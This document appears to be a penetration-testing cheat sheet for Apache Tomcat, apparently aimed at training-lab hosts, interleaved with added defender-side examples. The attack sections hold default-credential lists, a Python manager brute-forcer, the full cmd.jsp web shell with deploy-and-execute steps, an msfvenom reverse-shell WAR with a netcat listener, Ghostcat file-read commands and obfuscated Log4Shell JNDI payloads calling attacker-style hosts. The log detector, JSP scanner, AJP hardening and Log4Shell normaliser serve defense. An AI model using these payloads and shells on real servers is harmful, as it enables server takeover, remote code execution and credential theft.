Discovery
http://app-dev.inlanefreight.local:8080/invalid
$ curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat
<html lang="en"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><link href="./images/docs-stylesheet.css" rel="stylesheet" type="text/css"><title>Apache Tomcat 9 (9.0.30) - Documentation Index</title><meta name="author"
<SNIP>
Interesting Files
WEB-INF/web.xml
tomcat-users.xml
<SNIP>
<!-- user manager can access only manager section -->
<role rolename="manager-gui" />
<user username="tomcat" password="tomcat" roles="manager-gui" />
<!-- user admin can access manager and admin section both -->
<role rolename="admin-gui" />
<user username="admin" password="admin" roles="manager-gui,admin-gui" />
</tomcat-users>
Enumeration
gobuster dir -u http://web01.inlanefreight.local:8180/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
ROOT
add
admin
admin-console
balancer
dav
deploy
docs
examples
examples/jsp/index.html
examples/jsp/snp/snoop.jsp
examples/jsp/source.jsp
examples/servlet/HelloWorldExample
examples/servlet/SnoopServlet
examples/servlet/TroubleShooter
examples/servlet/default/jsp/snp/snoop.jsp
examples/servlet/default/jsp/source.jsp
examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample
examples/servlet/org.apache.catalina.INVOKER.SnoopServlet
examples/servlet/org.apache.catalina.INVOKER.TroubleShooter
examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp
examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp
examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp
examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp
examples/servlet/snoop
examples/servlets/index.html
examples/websocket/index.xhtml
host-manager
host-manager/add
host-manager/host-manager.xml
host-manager/html
host-manager/html/*
host-manager/list
host-manager/remove
host-manager/start
host-manager/stop
html/*
install
invoker/JMXInvokerServlet
j4p
jmx-console
jmx-console/HtmlAdaptor
jmxproxy/*
jsp-examples
list
manager
manager/deploy
manager/html
manager/html/*
manager/install
manager/jmxproxy
manager/jmxproxy/*
manager/list
manager/manager.xml
manager/reload
manager/remove
manager/resources
manager/roles
manager/save
manager/serverinfo
manager/sessions
manager/start
manager/status.xsd
manager/status/*
manager/stop
manager/undeploy
reload
remove
resources
roles
save
server-manager/html
serverinfo
servlet/default/
servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif
servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet
servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/
servlet/org.apache.catalina.servlets.DefaultServlet/
servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif
servlet/org.apache.catalina.servlets.HTMLManagerServlet
servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif
servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet
servlet/org.apache.catalina.servlets.ManagerServlet
servlet/org.apache.catalina.servlets.SnoopAllServlet
servlet/org.apache.catalina.servlets.WebdavServlet/
servlets-examples
sessions
start
status
status/*
stop
tomcat-docs
tomcat/manager/html
undeploy
web-console
web-console/Invoker
webdav
webdav/index.html
webdav/servlet/org.apache.catalina.servlets.WebdavServlet/
webdav/servlet/webdav/
Wordlists
Password
tomcat::Tomcatadm
osboxes@osboxes:~$ creds search tomcat
+----------------------------------+------------+------------+
| Product | username | password |
+----------------------------------+------------+------------+
| apache tomcat host manager (web) | admin | admin |
| apache tomcat host manager (web) | ADMIN | ADMIN |
| apache tomcat host manager (web) | admin | <blank> |
| apache tomcat host manager (web) | admin | j5Brn9 |
| apache tomcat host manager (web) | admin | tomcat |
| apache tomcat host manager (web) | cxsdk | kdsxc |
| apache tomcat host manager (web) | j2deployer | j2deployer |
| apache tomcat host manager (web) | ovwebusr | OvW*busr1 |
| apache tomcat host manager (web) | QCC | QLogic66 |
| apache tomcat host manager (web) | role1 | role1 |
| apache tomcat host manager (web) | role1 | tomcat |
| apache tomcat host manager (web) | role | changethis |
| apache tomcat host manager (web) | root | root |
| apache tomcat host manager (web) | tomcat | changethis |
| apache tomcat host manager (web) | tomcat | s3cret |
| apache tomcat host manager (web) | tomcat | tomcat |
| apache tomcat host manager (web) | xampp | xampp |
+----------------------------------+------------+------------+
cat /opt/tools/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt
j2deployer j2deployer
ovwebusr OvW*busr1
cxsdk kdsxc
root owaspbwa
ADMIN ADMIN
xampp xampp
tomcat s3cret
QCC QLogic66
admin vagrant
admin password
admin
admin Password1
admin password1
admin admin
admin tomcat
both tomcat
manager manager
role1 role1
role1 tomcat
role changethis
root Password1
root changethis
root password
root password1
root r00t
root root
root toor
tomcat tomcat
tomcat password1
tomcat password
tomcat
tomcat admin
tomcat changethis
Tomcat Manager - Login Brute Force
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST web01.inlanefreight.local
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.129.201.58
mgr_brute.py
#!/usr/bin/env python3
import argparse
import requests
from termcolor import cprint

parser = argparse.ArgumentParser(description="Tomcat manager or host-manager credential bruteforcing")
parser.add_argument("-U", "--url", type=str, required=True, help="URL to tomcat page")
parser.add_argument("-P", "--path", type=str, required=True, help="manager or host-manager URI")
parser.add_argument("-u", "--usernames", type=str, required=True, help="Users file")
parser.add_argument("-p", "--passwords", type=str, required=True, help="Passwords file")
args = parser.parse_args()

# Join base URL and application path without producing a double slash
new_url = args.url.rstrip("/") + "/" + args.path.lstrip("/")

# One username / password per line
with open(args.usernames) as f_users:
    usernames = [x.strip() for x in f_users]
with open(args.passwords) as f_pass:
    passwords = [x.strip() for x in f_pass]

cprint("\n[+] Attacking.....", "red", attrs=['bold'])
found = False
for u in usernames:
    for p in passwords:
        r = requests.get(new_url, auth=(u, p))
        # manager/host-manager answer 401 for bad credentials and 200 once login succeeds
        if r.status_code == 200:
            cprint("\n[+] Success!!", "green", attrs=['bold'])
            cprint("[+] Username : {}\n[+] Password : {}".format(u, p), "green", attrs=['bold'])
            found = True
            break
    if found:
        break

if not found:
    cprint("\n[+] Failed!!", "red", attrs=['bold'])
    cprint("[+] Could not find the creds :( ", "red", attrs=['bold'])
$ python3 mgr_brute.py -U http://web01.inlanefreight.local:8180/ -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
[+] Attacking.....
[+] Success!!
[+] Username : tomcat
[+] Password : admin
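From the defender's side, the brute force above leaves a very recognisable trace in the Tomcat access log: a burst of 401 responses for /manager or /host-manager from one client, often followed by a 200 with a username filled in. The detector below is an added example (not from the original page, not a Tomcat feature) that runs over constructed log lines in the default AccessLogValve pattern `%h %l %u %t "%r" %s %b`; the five-failures-in-60-seconds threshold is an assumption.

```python
import re
from collections import defaultdict
from datetime import datetime

# Default Tomcat AccessLogValve pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)
MANAGER_PATHS = ("/manager", "/host-manager")

# Constructed sample: six failed logins from one host, then a success, plus unrelated traffic
SAMPLE_LOG = """\
10.10.14.15 - - [21/Sep/2021:20:05:01 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.15 - - [21/Sep/2021:20:05:01 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.15 - - [21/Sep/2021:20:05:02 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.129.201.1 - - [21/Sep/2021:20:05:02 -0400] "GET /docs/ HTTP/1.1" 200 4832
10.10.14.15 - - [21/Sep/2021:20:05:02 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.15 - - [21/Sep/2021:20:05:03 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.15 - - [21/Sep/2021:20:05:03 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.15 - tomcat [21/Sep/2021:20:05:04 -0400] "GET /manager/html HTTP/1.1" 200 15121
10.129.201.1 - - [21/Sep/2021:20:05:10 -0400] "GET /host-manager/html HTTP/1.1" 401 2473
"""


def parse(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_manager_bruteforce(lines, threshold=5, window_seconds=60):
    """Return (client_ip, message) alerts for 401 bursts against the manager apps
    and for a successful manager login that follows such failures."""
    failures = defaultdict(list)  # client ip -> timestamps of recent 401s
    alerts = []
    for line in lines:
        rec = parse(line)
        if rec is None or not rec["path"].startswith(MANAGER_PATHS):
            continue
        ip, ts = rec["ip"], rec["ts"]
        if rec["status"] == 401:
            # keep only failures inside the sliding window
            recent = [t for t in failures[ip] if (ts - t).total_seconds() <= window_seconds]
            recent.append(ts)
            failures[ip] = recent
            if len(recent) == threshold:
                alerts.append((ip, "manager brute force: %d failures in %ds" % (threshold, window_seconds)))
        elif rec["status"] == 200 and failures[ip]:
            alerts.append((ip, "successful manager login as %s after %d failures"
                           % (rec["user"], len(failures[ip]))))
            failures[ip] = []
    return alerts


if __name__ == "__main__":
    for ip, msg in detect_manager_bruteforce(SAMPLE_LOG.splitlines()):
        print("[!] %s %s" % (ip, msg))
```

The second alert type is the one worth paging on: a 200 for /manager/html with a real username right after a run of 401s from the same client means the guessing worked.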
Tomcat Manager - WAR File Upload
Manually
jsp shell: https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML>
$ wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
$ zip -r backup.war cmd.jsp
adding: cmd.jsp (deflated 81%)
In the manager web interface, click Browse to select the .war file and then click on Deploy.
$ curl http://web01.inlanefreight.local:8180/backup/cmd.jsp?cmd=id
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
Command: id<BR>
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
</pre>
</BODY></HTML>
Msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.war
nc -lnvp 4443
listening on [any] 4443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.201.58] 45224
id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
Metasploit
multi/http/tomcat_mgr_upload
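Whichever route deploys the WAR, the result on disk is the same: a new application directory under webapps containing a JSP that hands request parameters to Runtime.exec. The scanner below is an added defender-side example (not from the original page, not part of Tomcat) that walks a webapps tree and reports JSP files calling a command-execution sink; it builds a constructed sample tree in a temporary directory so it runs offline. The two sink patterns are an assumption and will not catch every shell, but they do match cmd.jsp above.

```python
import os
import re
import tempfile

# Java command-execution sinks typical of JSP shells such as cmd.jsp (assumed pattern set)
SINK_PATTERNS = {
    "Runtime.exec": re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\("),
    "ProcessBuilder": re.compile(r"new\s+ProcessBuilder\s*\("),
}


def scan_webapps(root):
    """Walk a Tomcat webapps directory and return sorted (relative path, sink) findings
    for every .jsp/.jspx file that calls a command-execution sink."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".jsp", ".jspx")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="ignore") as fh:
                source = fh.read()
            for label, pattern in SINK_PATTERNS.items():
                if pattern.search(source):
                    findings.append((os.path.relpath(path, root), label))
    return sorted(findings)


# Constructed sample tree: a benign page under ROOT and a shell-like JSP in a "backup" app
SAMPLE_FILES = {
    "ROOT/index.jsp": '<%@ page language="java" %><html><body>Hello <%= request.getRemoteAddr() %></body></html>',
    "backup/cmd.jsp": '<% Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
    "backup/README.txt": "not a jsp, so it is skipped even though it mentions Runtime.getRuntime().exec(",
}


def demo():
    """Write the constructed sample tree to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, content in SAMPLE_FILES.items():
            full = os.path.join(tmp, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(content)
        return scan_webapps(tmp)


if __name__ == "__main__":
    for rel_path, sink in demo():
        print("[!] %s calls %s" % (rel_path, sink))
```

Point `scan_webapps` at the real webapps directory (for example /opt/tomcat/webapps) and diff its output against a known-good baseline; a JSP with an exec sink in an application nobody deployed on purpose is the artefact of exactly the upload shown above.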
Exploitation
CVE-2024-50379 - RCE
Time-of-Check Time-of-Use (TOCTOU) race condition that can lead to remote code execution (RCE) if the server's configuration allows writable directories.
Upload a JSP shell to a vulnerable server and execute commands remotely.
CVE-2024-52316 - Authentication Bypass
Affected versions: prior to 10.1.31
CVE-2024-40725 and CVE-2024-40898 - SSRF
Apache HTTP Server versions 2.4.0 through 2.4.61
CVE-2024-52318 - XSS
Apache Tomcat 11.0: versions prior to 11.0.1
Apache Tomcat 10.1: versions prior to 10.1.33
Apache Tomcat 9.0: versions prior to 9.0.97
CVE-2024-52317 - Data Leakage
Apache Tomcat 11.0: versions prior to 11.0.0
Apache Tomcat 10.1: versions prior to 10.1.31
Apache Tomcat 9.0: versions prior to 9.0.96
Ghostcat
nmap -sV -p 8009,8080 app-dev.inlanefreight.local
Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-21 20:05 EDT
Nmap scan report for app-dev.inlanefreight.local (10.129.201.58)
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.30
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.36 seconds
The exploit can only read files and folders within the web apps folder, which means that files like /etc/passwd can't be accessed.
python2.7 tomcat-ajp.lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xml
python3 exploit:
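The root cause Ghostcat relies on is an AJP connector listening on every interface, as port 8009 does in the scan above. As an added hardening example (not from the original page), the server.xml fragment below shows the two defensive settings: comment the connector out entirely when no reverse proxy speaks AJP to Tomcat, or bind it to loopback and require a shared secret that the proxy must present. The secret value is a placeholder to be replaced with a long random string.

```xml
<!-- server.xml excerpt: AJP connector hardening (added example, not from the page) -->

<!-- Option 1: no AJP at all. Leave the connector commented out if nothing uses it.
<Connector protocol="AJP/1.3" port="8009" redirectPort="8443" />
-->

<!-- Option 2: AJP only from the local reverse proxy, and only with a shared secret. -->
<Connector protocol="AJP/1.3"
           address="127.0.0.1"
           port="8009"
           secretRequired="true"
           secret="REPLACE_WITH_LONG_RANDOM_SECRET"
           redirectPort="8443" />
```

After the change, the nmap check above should no longer show 8009/tcp open from a remote host, and an AJP client without the secret is rejected by the connector.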
Log4Shell
${jndi:ldap://xxxxx.burpcollaborator.net/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} - AWS Firewall Bypass
${jndi:ldap://${env:user}.xyz.collab.com/a} - Default Payload
# ":-" notation
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://somesitehackerofhell.com/z}
# Unicode characters
${\u006a\u006e\u0064\u0069:ldap://somesitehackerofhell.com/z}
# "::-" notation
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://somesitehackerofhell.com/z}
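The obfuscated variants above all defeat a naive `${jndi:` string match, which is why a detector has to undo the same Log4j lookup rules the payload abuses before it looks for the JNDI prefix. The normaliser below is an added example (not from the original page) that decodes `\uXXXX` escapes, resolves `${name:-default}` to its default (the name part, as in `${::-j}` or `${k8s:k5:-ND}`, is ignored), applies `${lower:…}`/`${upper:…}`, leaves unknown lookups such as `${env:user}` in place, and then checks the result for `${jndi:`. The host names in the test inputs are placeholders.

```python
import re

UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
# An innermost ${...} group: one that contains no nested "${"
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
JNDI_PREFIX = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match):
    """Resolve one innermost lookup the way Log4j 2 interpolation does for the
    forms used in the evasions above; unknown lookups are kept literally."""
    inner = match.group(1)
    if ":-" in inner:
        # ${anything:-default} evaluates to "default" (covers ${::-j} and ${:-l} too)
        return inner.split(":-", 1)[1]
    lookup, sep, arg = inner.partition(":")
    if sep and lookup.lower() == "lower":
        return arg.lower()
    if sep and lookup.lower() == "upper":
        return arg.upper()
    return match.group(0)


def normalize(text):
    """Decode unicode escapes and collapse nested lookups until nothing changes."""
    text = UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
    while True:
        resolved = INNERMOST.sub(_resolve, text)
        if resolved == text:
            return text
        text = resolved


def is_jndi_lookup(text):
    """True if the input, once de-obfuscated, carries a ${jndi:...} lookup."""
    return JNDI_PREFIX.search(normalize(text)) is not None


# Constructed inputs mirroring the payload shapes listed above (placeholder hosts)
SAMPLES = [
    "${jndi:ldap://collab.example/a}",
    "${j${k8s:k5:-ND}i${sd:k5:-:}ldap://collab.example:1389/o}",
    "${jndi:ldap://${env:user}.collab.example/a}",
    "${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://collab.example/z}",
    r"${\u006a\u006e\u0064\u0069:ldap://collab.example/z}",
    "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://collab.example/z}",
    'GET /index.html HTTP/1.1 "Mozilla/5.0"',
]

if __name__ == "__main__":
    for s in SAMPLES:
        print("%-6s %s" % ("JNDI" if is_jndi_lookup(s) else "clean", normalize(s)))
```

Feed it the fields an attacker controls and Log4j would log (User-Agent, X-Forwarded-For, login names, URL paths) rather than whole lines, so a benign `${` elsewhere in a line does not hide the match. Resolving defaults before matching is what makes the "::-" and ":-" variants and the lower/upper trick collapse back to the plain `${jndi:` prefix.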
Spring4Shell
Tomcat CGI
Tools
Resources